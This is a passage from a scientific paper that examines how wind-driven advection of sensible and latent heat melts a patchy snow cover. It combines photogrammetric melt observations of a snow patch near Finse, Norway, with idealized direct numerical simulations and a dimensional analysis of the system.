essential to the\n\nWe expect that it is possible to reduce the classification to a finite calculation, and that the p-groups of a given coclass can be partitioned into finitely many families, where\n\n• Additional High Conservation Value Vegetation (AHCVV) means areas of vegetation which were found during ground-truthing which would otherwise meet the definition of Existing\n\nTheorem 1.18 If we have a sequence of groups and homomorphisms linking them which contains the following part which is exact at G:.. 1 → G → θ H then θ is\n\nWe show that it is unique up to isomorphism among those having a point a whose stabilizer in the automorphism group both fixes setwise every line on a and contains a subgroup that\n\nIntermediate growth is inherited by subgroups of finite index, so the same applies to the groups N(T ) ≤ Γ and the associated maps.... Example Nilpotent-by-finite groups have\n\nFor all but E 8 (q) in even characteristic, our algorithms to construct the SL 2 subgroups and to label the root and toral elements are black-box provided that the algorithms\n\nMore generally, G with large abelian factor group may have Cayley graphs with diameter proportional to |G|... The diameter\n\nGow proved that the conjecture holds for the symplectic groups P Sp 2n (q) if q ≡ 1 mod 4, and in proved that every semisimple element of a finite simple group of Lie type\n\n5.15 At the time of Mr C’s requests for access to the NDIS, the NDIA did not have any policy or guideline dealing specifically with incarcerated individuals and access to the NDIS.\n\nClassification of reflexible regular Cayley maps on abelian groups. Classification of t-balanced regular Cayley map on\n\nRich theory of cartesian decompositions preserved by groups with a transitive minimal normal subgroup.\n\nexistence. In making such an estimate, the Government Printer was requested to take as understood that each author body would have its report printed by the" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7140042,"math_prob":0.99096894,"size":39502,"snap":"2023-40-2023-50","text_gpt3_token_len":14502,"char_repetition_ratio":0.15362804,"word_repetition_ratio":0.98404336,"special_character_ratio":0.3195028,"punctuation_ratio":0.15379596,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99729943,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T20:10:42Z\",\"WARC-Record-ID\":\"<urn:uuid:b544356b-3b24-4523-8177-731ff5e41277>\",\"Content-Length\":\"216499\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:070dc26e-8a2d-4f9c-b81f-883ae76e3b55>\",\"WARC-Concurrent-To\":\"<urn:uuid:a3923ac6-9e88-4269-8ad0-84073271b2d5>\",\"WARC-IP-Address\":\"104.21.80.99\",\"WARC-Target-URI\":\"https://5doc.co/document/zx5n0llv-regular-orbits.html\",\"WARC-Payload-Digest\":\"sha1:4FHLQMRJP44RL5CMQTJR63VU3NQ6S5QP\",\"WARC-Block-Digest\":\"sha1:Q6AVFB43IE5PKNC445KPVLB4DRAJ3OZ7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099942.90_warc_CC-MAIN-20231128183116-20231128213116-00031.warc.gz\"}"}
https://testbook.com/question-answer/iff-left-x-dfrac-1-x-right--611225b9a66c9e5b9eec2339
[ "# If $$f \\left( x + \\dfrac{ 1 } { x } \\right) = x^3 + \\dfrac{1}{x^3}$$, then f(√3) is equal to\n\nThis question was previously asked in\nUP TGT Mathematics 2021 Official Paper\nView all UP TGT Papers >\n1. 0\n2. 1\n3. √3\n4. 3√3\n\nOption 1 : 0\nFree\nCT 1: Indian History\n44.9 K Users\n10 Questions 10 Marks 6 Mins\n\n## Detailed Solution\n\nConcept:\n\nAccording to the rule of a linear function, we know that, if, f(x) = x\n\n$$⇒ f(ax)=ax$$\n\nwhere a is the coefficient of x.\n\nFormula used:\n\n• a3 + b3 = (a + b) (a2 + b2 - ab)      ----(1)\n\n• (a + b)2 = a2 + b2 + 2ab      ----(2)​\n\n• a3 + b3 = (a + b) {(a + b)2 - 3ab}      [using (1) & (2)]      ----(3)\n\nCalculation:\n\nWe have, $$f \\left( x + \\dfrac{ 1 } { x } \\right) = x^3 + \\dfrac{1}{x^3}$$\n\nUsing equation (3), we get\n\n$$⇒ f \\left( x + \\dfrac{ 1 } { x } \\right) = \\left( x + \\dfrac{ 1 } { x } \\right)\\left \\{ \\left( x + \\dfrac{ 1 } { x } \\right)^{2} \\ - \\ 3 \\right \\}$$\n\nLet $$x \\ + \\ \\frac{1}{x} = t$$\n\n⇒ f(t) = t (t2 - 3)\n\nOn putting t = √3, we get\n\n⇒ f(√3) = √3 {(√3)2 - 3}\n\n⇒ f(√3) = √3 (3 - 3)\n\n⇒ f(√3) = √3 (0)\n\n⇒ f(√3) = 0" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78725666,"math_prob":1.0000081,"size":1582,"snap":"2023-14-2023-23","text_gpt3_token_len":598,"char_repetition_ratio":0.121673,"word_repetition_ratio":0.14018692,"special_character_ratio":0.408976,"punctuation_ratio":0.069767445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999285,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-29T06:10:13Z\",\"WARC-Record-ID\":\"<urn:uuid:88c58ca9-582e-43df-b215-c4b64cd196ba>\",\"Content-Length\":\"162679\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ea477da8-c047-45b1-af11-f17d8314e098>\",\"WARC-Concurrent-To\":\"<urn:uuid:613ba3e1-6539-4cd7-9402-9851b0e087ef>\",\"WARC-IP-Address\":\"104.22.44.238\",\"WARC-Target-URI\":\"https://testbook.com/question-answer/iff-left-x-dfrac-1-x-right--611225b9a66c9e5b9eec2339\",\"WARC-Payload-Digest\":\"sha1:RJWINGDE7QZTDCN44JOWE3QLK5UUL6SD\",\"WARC-Block-Digest\":\"sha1:3WN2ZA2VSZ5ZA6G3EV7YU5WGLIEAZDF5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224644683.18_warc_CC-MAIN-20230529042138-20230529072138-00118.warc.gz\"}"}
https://tc.copernicus.org/articles/16/4319/2022/tc-16-4319-2022.html
[ "https://doi.org/10.5194/tc-16-4319-2022\nhttps://doi.org/10.5194/tc-16-4319-2022", null, "# Understanding wind-driven melt of patchy snow cover\n\nLuuk D. van der Valk, Adriaan J. Teuling, Luc Girod, Norbert Pirk, Robin Stoffer, and Chiel C. van Heerwaarden\nAbstract\n\nThe representation of snow processes in most large-scale hydrological and climate models is known to introduce considerable uncertainty into the predictions and projections of water availability. During the critical snowmelt period, the main challenge in snow modeling is that net radiation is spatially highly variable for a patchy snow cover, resulting in large horizontal differences in temperatures and heat fluxes. When a wind blows over such a system, these differences can drive advection of sensible and latent heat from the snow-free areas to the snow patches, potentially enhancing the melt rates at the leading edge and increasing the variability of subgrid melt rates. To get more insight into these processes, we examine the melt along the upwind and downwind edges of a 50 m long snow patch in the Finseelvi catchment, Norway, and try to explain the observed behavior with idealized simulations of heat fluxes and air movement over patchy snow. The melt of the snow patch was monitored from 11 June until 15 June 2019 by making use of height maps obtained through the photogrammetric structure-from-motion principle. A vertical melt of 23 ± 2.0 cm was observed at the upwind edge over the course of the field campaign, whereas the downwind edge melted only 3 ± 0.4 cm. When comparing this with meteorological measurements, we estimate the turbulent heat fluxes to be responsible for 60 % to 80 % of the upwind melt, of which a significant part is caused by the latent heat flux. The melt at the downwind edge approximately matches the melt occurring due to net radiation. To better understand the dominant processes, we represented this behavior in idealized direct numerical simulations, which are based on the measurements on a single snow patch by and resemble a flat, patchy snow cover with typical snow patch sizes of 15, 30, and 60 m. Using these simulations, we found that the reduction of the vertical temperature gradient over the snow patch was the main cause of the reductions in vertical sensible heat flux over distance from the leading edge, independent of the typical snow patch size. Moreover, we observed that the sensible heat fluxes at the leading edge and the decay over distance were independent of snow patch size as well, which resulted in a 15 % and 25 % reduction in average snowmelt for, respectively, a doubling and quadrupling of the typical snow patch size. These findings lay out pathways to include the effect of highly variable turbulent heat fluxes based on the typical snow patch size in large-scale hydrological and climate models to improve snowmelt modeling.\n\nShare\nDates\n1 Introduction\n\nSnow plays a crucial role for much of the world's population through the important water and climate services that it provides. Snowmelt is crucial for more than one-sixth of the world population for agricultural purposes or human consumption . Also, snow is a natural way to store water during the cold months; it is then released during spring and summer, when the water demands are higher (e.g., ). Changes in this snow cover, due to shifts in precipitation and temperature, have an impact on society and ecosystems , amongst other things. Strong changes in snow cover have been observed over the past decades in many regions, including Europe and the United States . To be able to assess the effects of changes in the snow cover, a more thorough understanding of the influence of snow processes on discharge is needed , and uncertainties in hydrological models due to snow storage and melt need to be overcome . Additional uncertainties are introduced by the transformation of a continuous snow cover into a patchy snow cover, as it is challenging to correctly capture the snow patches and associated processes even with relatively advanced hydrological and climate models (e.g., ). Uncertainty related to the modeling of snow processes might even lead to disagreement in the sign of projected mean streamflow changes . To reduce the modeling uncertainty of patchy snow covers, a deeper understanding of the snowmelt processes that occur under spatial variability is needed.\n\nThe main processes that cause snow to melt are different for a patchy snow cover than a continuous snow cover. For a continuous snow cover, the surface energy balance, which is responsible for snowmelt, is dominated by radiation (e.g., ). For this type of cover, the turbulent heat fluxes are mainly driven by large-scale air mass movement affecting the ambient air temperature or moisture and wind speed, which could cause these fluxes to be significant during brief periods . However, over longer periods, such as weeks, air temperature and moisture gradients near the surface are generally too low to generate significant turbulent heat fluxes (Hock2005). When the snow cover turns patchy, the net radiation becomes spatially highly variable due to variations in surface albedo and emissivity. This spatial variability can act at scales on the order of meters, such that a highly heterogeneous surface arises with a relatively warm (and possibly wet) snow-free area adjacent to a relatively cold (and drier) snow patch. When a wind blows over this horizontally heterogeneous surface, internal boundary layers form downwind of the transitions, due to changes in the surface conditions (e.g., ). The heterogeneity of these internal boundary layers induces a system in which the turbulent heat fluxes can highly vary spatially, partly due to the advection of sensible and latent heat . These systems are often described as separate growing boundary layers that follow a power law as a function of the fetch (e.g., ). For the stable internal boundary layers, i.e., those over snow patches, the air close to the snow surface can decouple from the warmer air above, due to either large temperature differences between both or through cold-air pooling, eventually limiting the transfer of sensible and latent heat from the atmosphere to the snow . Moreover, the influence of the turbulent heat fluxes on the total amount of melt increases with decreasing snow cover fraction . It has been suggested that this process can be responsible for up to 50 % of the total snowmelt (e.g., ). Additionally, similar processes have been found to potentially significantly contribute to snowmelt on ice fields (e.g., ) and glaciers . This stresses the potentially significant contribution of lateral transport of sensible and latent heat to a melting patchy snow cover, though it opens the question of what the hydrological relevance on larger scales is.\n\nIn spite of its potential importance, the lateral transport of sensible and latent heat is a rather underrepresented process in hydrological or even more complex atmospheric snow surface models, as these focus mainly on vertical melt processes. Traditionally, simple models of snowmelt in hydrological models use the so-called temperature index, which performs generally well with few computational costs. However, the performance of these models decreases significantly when increasing temporal resolution, adding a spatial component to the model, applying it beyond the period or domain of calibration (e.g., climate change), or during rain-on-snow events (e.g., ). The spatial component is especially important in mountainous regions due to topographical effects such as cold-air pooling and shading, which are not taken into account with the temperature index. Furthermore, the exclusion of the wind speed in temperature-index models can cause a bias for the amount of modeled snowmelt, especially when turbulence-driven snowmelt becomes increasingly important, for example for patchy snow covers (e.g., ). Even when using complex atmospheric snow surface models such as Alpine3D with ARPS , local-scale advection associated with subgrid variation of snow and bare ground is excluded. A few models, such as Alpine3D and CHM , do include wind-driven processes such as snow redistribution and turbulent heat fluxes, but models most often parameterize the subgrid turbulent fluxes with the average temperature or moisture at the surface and the lowest atmospheric layer per grid cell, and they do not account for melt fluxes with subgrid spatial variations. As potential solutions, propose a simple model to include local-scale advection of the sensible and latent heat to snowmelt using scaling laws, while develops a more complex approach based on the integration of the energy equation as suggested by using mixing length theory (Weismann1977). Considering the subgrid heterogeneity of the melting fluxes would significantly improve snow cover and discharge predictions . Still, implementing the subgrid turbulent fluxes using a parametrization is difficult, mainly due to the small spatial scales of the local-scale advection and the interplay between snow cover area and melt rates , as well as the process is less well understood on a catchment scale . As a consequence, more field observations should be performed to study its importance in various environmental settings. Additionally, these should be combined with other modeling approaches that can serve as a tool to improve our understanding of the process on small and larger scales. Such progress will eventually enable the implementation of lateral transport of the sensible and latent heat.\n\nDedicated observations are needed to quantify the importance of the sensible and latent heat advection in snowmelt. Several field measurements have focused on the meteorological surface characteristics, such as the development of an internal boundary layer (IBL) as a consequence of the heterogeneous snow cover or the influence of a topographical depression on cold-air pooling and subsequent snowmelt . Other field measurement campaigns have estimated the turbulent heat fluxes and the accompanying mechanisms for a single isolated snow patch (e.g., ). However, all of these experiments focused on relatively brief periods of time with a maximum time span of a day, during which the conditions for local-scale advection of sensible and latent heat were often ideal. For small areas in complex terrain and longer periods, related the measured snowmelt to turbulence, while estimated the role of advection of the sensible heat by comparing estimated sensible heat fluxes with and without advection. Yet, estimates of a multiple-day contribution of the turbulent heat fluxes to the melt of a single snow patch are lacking, which could provide additional insights into the role of these fluxes over longer timescales.\n\nWhen observing the melt of a snow patch over the course of multiple days, high spatial variability of melt rates complicates the observations. Single-point measurements might not represent the region of interest, especially for seasonal snow covers . This advocates the use of spatial field observations at high temporal and spatial resolution for patchy snow covers. Ground-based methods fulfilling these requirements include, amongst others, terrestrial laser scanning or georectification of oblique time-lapse photography . Additionally, aerial platforms such as aerial laser scanning, either manned (e.g., ) or unmanned (e.g., ), can be used. The application of structure-from-motion (SfM) photogrammetry is possible from both positions as a relatively cheap method to monitor snowmelt. Its usage was explored back in the 1960s (e.g., ), but it was sidelined due to technical constraints. Recently, due to technical development that has increased its accuracy with lower computational costs, SfM photogrammetry has been used to successfully study seasonal snow covers with low-cost imaging equipment and software for analysis (e.g., ). Therefore, this method offers a promising way to monitor snowmelt with low costs and reasonable accuracy.\n\nTo eliminate parametrization uncertainties, a relatively new type of simulation, direct numerical simulation (DNS), can be applied to model local-scale advection, as it resolves all the relevant spatial and temporal scales of turbulence. This simulation type has already proven its value in the field of fluid dynamics and allows very detailed information to be extracted from the turbulent flow, enhancing our process-based understanding of local-scale advection. As a consequence of the high resolution, these simulations do not need any turbulence parametrizations based on stability corrections and the Monin–Obukhov assumptions, in contrast to numerical atmospheric boundary layer models or large-eddy simulations . These methods assume horizontal homogeneity and constant turbulent fluxes throughout the surface layer, but these assumptions are violated for a patchy snow cover, thus introducing a large uncertainty (e.g., ). successfully showed the potential of DNS to simulate snow and ice melt in complex terrain. Through several sensitivity tests, they assessed the influence of surface properties on the micrometeorology and the subsequent effect on the turbulent heat fluxes. Moreover, the simulations are used to further enhance our insight into the fundamental processes of melting ice cliffs. Thus, DNSs show high potential to be used as a tool to further enhance our understanding of local-scale advection and the eventual implementation of the process in larger models through the derivation of new parametrizations accounting for varying surface and meteorological characteristics.\n\nWhereas previous studies pioneered examinations of the lateral advection of sensible and latent heat, most often for a single snow patch, the question of how this process is affected by the typical spatial and temporal scales within a catchment remains. Moreover, new modeling attempts need to be undertaken to increase our understanding of the wind-driven processes occurring near the surfaces of melting patchy snow covers. Therefore, in this study, we aim to assess the role of horizontal advection of the sensible and latent heat in snowmelt for a snow patch in a real-world case and an idealized environment. In the real-world case, we will identify the role of the locally advected sensible and latent heat in the melting of a snow patch in the Finseelvi catchment through studying the vertical turbulent heat fluxes with SfM photogrammetry observations over the course of multiple days. The resulting snowmelt is compared to local meteorological measurements to put the snowmelt into perspective and extract the influence of the turbulent fluxes on this melt. Subsequently, we try to uncover the behavior of the vertical sensible heat fluxes during snowmelt – including the local-scale advection of sensible heat – in an idealized environment with DNS, allowing us to extract detailed information on a wind blowing over a small, flat domain with a patchy snow cover. This allows us to illustrate the performance of DNS as a tool to understand the real-world behavior and to try to explain this with idealized simulations. To do so, we perform these simulations with the computational fluid dynamics code MicroHH. We use the measurements of on a single snow patch as a basis for designing our numerical experiments, and choose to focus on the sensible heat flux. These measurements are done with close-to-idealized settings on a flat surface. Subsequently, we investigate the influence of enlarging snow patches on the vertical sensible heat fluxes into the snow, and the implications for snowmelt modeling.\n\n2 Snowmelt observations\n\nThe snowmelt observations were done in the Finseelvi catchment near Finse, Norway (17.6 km2; 6036 N, 730 E). This catchment is a snowmelt-dominated headwater basin with the discharge outlet located at an altitude of approximately 1340 m a.s.l. (Fig. 1). The catchment has a relatively smooth topography, which decreases the spatial complexity of the turbulent heat fluxes over snow patches (e.g., ). This, combined with a high contribution of turbulent heat fluxes to snowmelt, which is generally the case for maritime climates , makes the Finseelvi catchment a suitable location for assessing the influence of vertical turbulent heat fluxes on melting patchy snow covers. In the same region, hydrological studies such as have applied SfM timelapse photogrammetry for a patchy snow cover, and estimated the exchanges of mass and energy for a melting continuous snow cover. Moreover, at a distance of approximately 2.5 km to the southeast from the outlet of the catchment, meteorological measurements were taken (Fig. 1). The meteorological data were retrieved from a meteorological flux tower at a temporal resolution of 30 min and includes, amongst others, temperature, precipitation, wind speed and direction, incoming radiation, and relative humidity.", null, "Figure 1Overview of the Finseelvi research area, with the location of the snow patch and the daily averaged discharge and snow cover fraction data for the catchment shown. The map of Norway was obtained from https://norgeibilder.no/ (last access: 23 March 2020); the catchment area and the streams were respectively obtained through the University of Oslo and the Norwegian Water Resources and Energy Directorate (http://nedlasting.nve.no/gis/, last access: 7 January 2020). The zoomed image was made by the Sentinel-2 satellite on 13 June 2018, with the snow patch (white areas are snow covered) and local wind direction indicated as experienced during the field campaign (the local wind direction resembled the measured direction at the meteorological tower).\n\nWe assess the influence of the vertical turbulent heat fluxes on a melting single snow patch within the Finseelvi catchment. From this snow patch (Fig. 1), daily height maps are obtained through photogrammetry performed over the course of 11 June until 15 June 2019 for the upwind and downwind edges of the snow patch. As the dominant wind direction experienced at the snow patch resembled the measured wind direction at the meteorological tower, which was constant throughout the field campaign (Table 4 in Sect. 4), we assume that the upwind and downwind locations of the snow patch were approximately constant. The length of the snow patch was approximately 50 m, with the maximum snow depth in the regions of interest estimated to be on the order of 0.5 m. Selection of the location was based on the following criteria: a relatively flat surface and the absence of complex topographical features nearby, which could complicate the incoming radiation by causing, for instance, partial shading. The height maps enable us to derive the amount of snowmelt during these 5 d for this single snow patch and assess the role of the vertical turbulent heat fluxes. To do so, the meteorological data are averaged over the period between the photogrammetry observations and compared with the daily melt observations. Also, three snow samples were taken to determine the snow density, such that the measured height changes could be converted to a volume. The samples were taken by digging a small snow pit and collecting 100 mL samples at 5, 25, and 45 cm below the snow surface on 14 June. The snowpit was dug in snow adjacent to the snow patch so that the measurements would be similar to those for the snow patch but they would not affect the photogrammetry observations. We are aware that samples taken on a single day and location do not reflect the potentially complex temporal and spatial dynamics of the snow density. However, we assume the variations occurring at these scales to be relatively small compared to other uncertainties introduced by our analysis when computing estimates of the contribution of the vertical turbulent heat fluxes to the snowmelt.\n\nThe height maps are obtained by applying the photogrammetric principle of structure from motion (SfM) using MicMac . A total of 1087 pictures (610 for the upwind edge, 477 for the downwind edge) were taken from various positions at both edges and at time points spread out over the 5 d using a Xiaomi A2 smartphone camera. By using a ground-based camera, we were not able to obtain height maps covering the entire snow patch, which does prohibit a detailed analysis of the snowmelt. Yet, by using this method, we illustrate that it is still possible to come up with relatively decent snowmelt estimates using a simple and cheap method. The method is based on that of , who studied the melt of a relatively large snowfield with three time-lapse cameras over the course of an ablation season. In this study, MicMac is used to initially determine the camera positions and orientations. Subsequently, tie points appearing on multiple images for all days are obtained, such that the orientations of the camera positions can be determined. Considering images from all days during the tie point retrieval allows the eventual height models per day to be coregistered from the start. Eventually, each time step is processed using the MicMac implementation of multiview stereopsis to create point clouds for each day, which are interpolated into orthoimages and digital elevation models (DEM). The orthoimages are in RGB colors, allowing snow to be distinguished from bare ground and the amount of snowmelt to be determined for snow-covered pixels (0.04 × 0.04 m) in the DEM.\n\nBoth types of grids are available for each of the 5 d and for both locations (the upwind and downwind edges), such that we have 20 grids in total. For both locations, the following post-processing procedure is performed after obtaining the grids:\n\n1. For all grids, remove isolated groups of cells which are smaller than 0.05 m2.\n\n2. For all grids, apply a median filter of 5 × 5 pixels to diminish the influence of noise located within the areas of interest but maintain the sharp transitions between snow and snow-free surfaces.\n\n3. Compute the median height of the bare ground cells per day. The cells selected for this computation should be covered by all grids and already be bare ground on the first day.\n\n4. Compute correction heights by comparing the daily median heights of the bare ground with the median height on the first day (step 3).\n\n5. Remove bare ground cells from the DEM based on orthoimages of the same day, such that only snow-covered cells remain for each day.\n\n6. Apply the correction height (step 4) to the snow-covered DEM (step 5) for each day.\n\n7. For snow-covered grid cells that are present on each day (step 5), we calculate height differences between the DEM for the first day and the DEMs for the other days (step 6). We remove absolute height differences of larger than 50 cm, as larger values are highly unlikely to occur.\n\nThe resulting height differences over time correspond to 6.7 and 30.7 m2, respectively, for the upwind and downwind edges. We chose to solely use grid cells that are continuously covered by snow and have a recorded height change on each day to reduce the chance of cells being random scatter. Additionally, this method does not include cells with relatively shallow snow depths, for which the recorded melt could be affected by the presence of the bare ground below the snow.\n\nWe are aware that these filters have an effect on the number of analyzed grid cells and could cause an underestimation of the amount of snowmelt, especially on the upwind edge, due to the varying locations of snow-covered grid cells and the retreating snow line (Fig. A1). For the downwind edge, the approximately constant locations of the snow-covered grid cells combined with only minor retreat at this edge causes this area to be significantly larger. Due to the issue with the sizes of the covered areas, we decided to treat both the edges as a “point” and not consider the spatial distribution of the recorded melt.\n\nTo determine the snowmelt based on the net radiation, the measured incoming radiation is combined with estimates of the outgoing radiation based on common snow characteristics. The outgoing shortwave radiation is calculated by assuming a snow albedo of between 0.6 and 0.8. These values are based on , who reports albedos of approximately 0.8 for the same region in May. We use both of these values in the following calculations to account for the uncertainty in the albedo due to spatial and temporal variations and other potential uncertainties in the shortwave component. We also assume an appropriate estimate of the longwave radiation component for the larger region. Furthermore, we assume that the snowpack is continuously ripe throughout research period, given that the air temperature was continuously above freezing point and the largest discharge peak had already taken place 1.5 months before the observation period. This allows us to compute the outgoing longwave radiation according to the law of Stefan–Boltzmann (i.e., ${\\mathrm{LW}}^{↑}=\\mathit{ϵ}\\mathit{\\sigma }{T}_{\\mathrm{sn}}^{\\mathrm{4}}$). It is assumed that the emissivity ϵ is close to unity and the snow surface temperature is 273.15 K, such that the outgoing longwave radiation is approximately 315 W m−2. This results in the following equation for net radiation:\n\n$\\begin{array}{}\\text{(1)}& {R}_{\\mathrm{net}}=\\left(\\mathrm{1}-\\mathit{\\alpha }\\right){\\mathrm{SW}}^{↓}+{\\mathrm{LW}}^{↓}-\\mathit{\\sigma }{T}_{\\mathrm{sn}}^{\\mathrm{4}},\\end{array}$\n\nin which Rnet (W m−2) is the net radiation, α () is the snow albedo, and σ (W m−2 K−4​​​​​​​) is the constant of Stefan–Boltzmann. Subsequently, we calculate the amount of snowmelt caused by the net radiation by combining the net radiation with the snow density and the constant for latent heat of fusion, which is 334 KJ kg−1. This can be recalculated such that the radiation-driven melt is eventually expressed as a height change:\n\n$\\begin{array}{}\\text{(2)}& {M}_{\\mathrm{R}}=\\frac{{R}_{\\mathrm{net}}×\\mathrm{\\Delta }t}{{\\mathit{\\rho }}_{\\mathrm{sn}}×{L}_{\\mathrm{f}}}\\phantom{\\rule{0.125em}{0ex}},\\end{array}$\n\nin which MR (m) is the snowmelt due to radiation expressed as a height change, Δt (s) is the time between photogrammetry observations, ρsn (kg m−3) is the snow density, and Lf (J kg−1) the constant of the latent heat of fusion. Subsequently, we assume that the total melt is caused by radiation and the vertical turbulent heat fluxes (e.g., ), such that the difference between the total observed melt and the computed radiation-driven melt can be attributed to these turbulent heat fluxes.\n\nTo obtain an indication of the influence of the latent heat on the melt, the relative humidity is used to calculate the vapor pressure difference between the air and snow surface (eesn) and, subsequently, the specific humidity difference (qqsn). To calculate eesn, we assume the vapor pressure of the snow to be the saturated vapor pressure of air at 0 C, which is 0.613 kPa. We are aware that the relative humidity used (measured at the meteorological tower) probably does not reflect the exact conditions at the snow patch. Therefore, we only use these computed values as an indication of the contribution of the latent heat to the melt.\n\nWhen comparing the measured meteorological conditions with the snowmelt, especially the net radiation (Eqs. 1 and 2), the spatial variability of these conditions should be considered. For this comparison, we apply the measured values without performing any additional computations other than time averaging, introducing additional uncertainty. For example, the snow patch was located at the bottom of a north–south-oriented side valley, which caused shading at sunrise and sunset. The most prominent mountains to the east and west of the snow patch were approximately 150 to 200 m higher than and 1 to 1.5 km distant from the snow patch. The meteorological measurements were done in an east–west-oriented main valley, such that less shading occurs at sunrise and sunset.", null, "Figure 2Conceptual situation sketches. Sketches of one snow patch and the adjacent bare ground (i.e., an element) (a) and an exemplary horizontal domain with indicated element and snow patches (b). The parameters represent the viscosity ν, thermal diffusivity κ, wind speed u, height of the atmospheric surface layer δ, average size of one snow patch element λelem (consisting of the length of the snow patch λsn and the adjacent bare ground: ${\\mathit{\\lambda }}_{\\mathrm{elem}}\\equiv {\\mathit{\\lambda }}_{\\mathrm{bg}}+{\\mathit{\\lambda }}_{\\mathrm{sn}}$), and the buoyancies of the snow bsn and the bare ground bbg.\n\n3 Idealized system\n\n## 3.1 System description\n\nWe used an idealized system (Fig. 2) to study the turbulent heat fluxes in detail and understand the behavior observed in the field. As this is one of the first studies to use DNS to investigate the role of the vertical turbulent heat fluxes and local heat advection in these systems, we focus on the sensible heat flux, even though MicroHH allows us to include the latent heat flux (e.g., ). Instead of using our own measurements, the idealized system is based on the measurements of a single snow patch done by , due to the availability of relatively high-resolution measurements and the similarity to an idealized system in which the contribution of the local-scale advection of the sensible and latent heat to the total melt is relatively large. We are aware that this complicates the comparison between our observations and simulations. The prescribed conditions within simulations of the idealized system are based on the observations of and obtained through a dimensional analysis (elaborated on in Sect. 3.2). We assume that our idealized system consists of, on average, a near-neutral atmosphere above a patchy surface with heterogeneous properties and can be described by the following variables:\n\n$\\begin{array}{}\\text{(3)}& \\left(\\mathit{\\nu },\\mathit{\\kappa },u,\\mathit{\\delta },{\\mathit{\\lambda }}_{\\mathrm{elem}},{\\mathit{\\lambda }}_{\\mathrm{sn}},{b}_{\\mathrm{sn}},{b}_{\\mathrm{bg}}\\right).\\end{array}$\n\nThe viscosity ν (m2 s−1), thermal diffusivity κ (m2 s−1), and wind speed u (m s−1) describe the properties of the neutral atmosphere. δ (m) is the height of the atmospheric surface layer, λelem (m) represents the average size of one snow patch element, consisting of the snow patch itself (λsn) and the adjacent bare ground (${\\mathit{\\lambda }}_{\\mathrm{elem}}\\equiv {\\mathit{\\lambda }}_{\\mathrm{bg}}+{\\mathit{\\lambda }}_{\\mathrm{sn}}$). The buoyancies of the surface layer over the snow (bsn) and the bare ground (bbg) are defined as\n\n$\\begin{array}{}\\text{(4)}& b\\equiv \\frac{g}{{\\mathit{\\theta }}_{\\mathrm{atm}}}\\left(\\mathit{\\theta }-{\\mathit{\\theta }}_{\\mathrm{atm}}\\right),\\end{array}$\n\nin which g (m s−2) is the gravitational acceleration, θatm (K) is the temperature of the atmosphere, and θ is, in our case, the temperature of snow, bare ground or atmosphere to be recalculated to the buoyancy b in this equation. This definition causes the temperature dimension to cancel out and m s−2 to remain as the unit. In the simulations, we assumed for each simulation that the simulated atmosphere is initially well mixed, such that the temperature of the atmosphere is constant with height (similar to ). Furthermore, we assumed that the horizontal extent is orders of magnitude larger than the elements so that this does not have an influence on the physics in the model.\n\nTo assess the impact of the snow patch size, we varied λsn in our simulations. Specifically, we doubled and quadrupled λsn compared to a reference simulation with 15 m long snow patches, similar to . Therefore, in the remainder of this paper, we will denote the reference simulation by P15m and the simulations with a doubled and a quadrupled snow patch size as P30m and P60m, respectively. The patches in P60m simulation (and some larger patches in the P30m simulation) can be compared with our own observations to study the dominant processes. Although the meteorology in the simulations is not based on the field observations, it allows for a qualitative analysis of the processes.\n\nFurthermore, an additional simulation is performed in which the system is the same as in the P15m simulation except that stability effects are excluded. This allows us to identify the influences of stability on the vertical sensible heat fluxes, as well as the dominant turbulent character. In this simulation, temperature does not influence the buoyancy of the air. To refer to this simulation in figures, we append “NB” (i.e., the abbreviation for “No Buoyancy”) to the name, i.e., P15m-NB.\n\n## 3.2 Dimensional analysis\n\n### 3.2.1 Parameter derivation\n\nTo​​​​​​​ create a system physically similar to the measurements done by within our modeling domain, a dimensional analysis is performed according to Buckingham's Pi theorem . The modeling domain in which we fit these measurements is based on the atmospheric turbulent channel flow from .\n\nAll of the descriptive variables (Sect. 3.1) are nondimensionalized by using δ and u as repeating variables, since these cover both the primary dimensions: [L] and [LT−1], respectively, and are constant throughout all the numerical experiments (Sect. 3.4). This results in six dimensionless groups, which can be combined into\n\n$\\begin{array}{}\\text{(5)}& \\left(\\frac{\\mathit{\\nu }}{\\mathit{\\kappa }},\\frac{u\\mathit{\\delta }}{\\mathit{\\nu }},\\frac{{\\mathit{\\lambda }}_{\\mathrm{sn}}^{\\mathrm{2}}}{{\\mathit{\\lambda }}_{\\mathrm{elem}}^{\\mathrm{2}}},\\frac{\\mathit{\\delta }}{{\\mathit{\\lambda }}_{\\mathrm{elem}}},-\\frac{{b}_{\\mathrm{sn}}\\mathit{\\delta }}{{u}^{\\mathrm{2}}},-\\frac{{b}_{\\mathrm{bg}}\\mathit{\\delta }}{{u}^{\\mathrm{2}}}\\right).\\end{array}$\n\nThe nondimensional parameters can be interpreted as follows:\n\n• $\\frac{\\mathit{\\nu }}{\\mathit{\\kappa }}$ is the Prandtl number (Pr). This is assumed to be constant throughout this study, such that the flow over the patchy surface always has the same characteristics and does not influence the outcome of the simulations. In this study, the number is set to 1 instead of 0.71, which is the atmospheric value. This deviation has negligible impacts on the flow and allows for simpler scaling when analyzing the simulations .\n\n• $\\frac{u\\mathit{\\delta }}{\\mathit{\\nu }}$ is the Reynolds number (Re). For the same reason as the Prandtl number, this parameter is taken to be constant throughout the study. During this study, the same Reynolds number as in is taken: 1.10×104. Therefore, we impose a wind speed of 0.11 m s−1, a 1 m vertical extent, and a viscosity of $\\mathrm{1.0}×{\\mathrm{10}}^{-\\mathrm{5}}$ m2 s−1.\n\n• 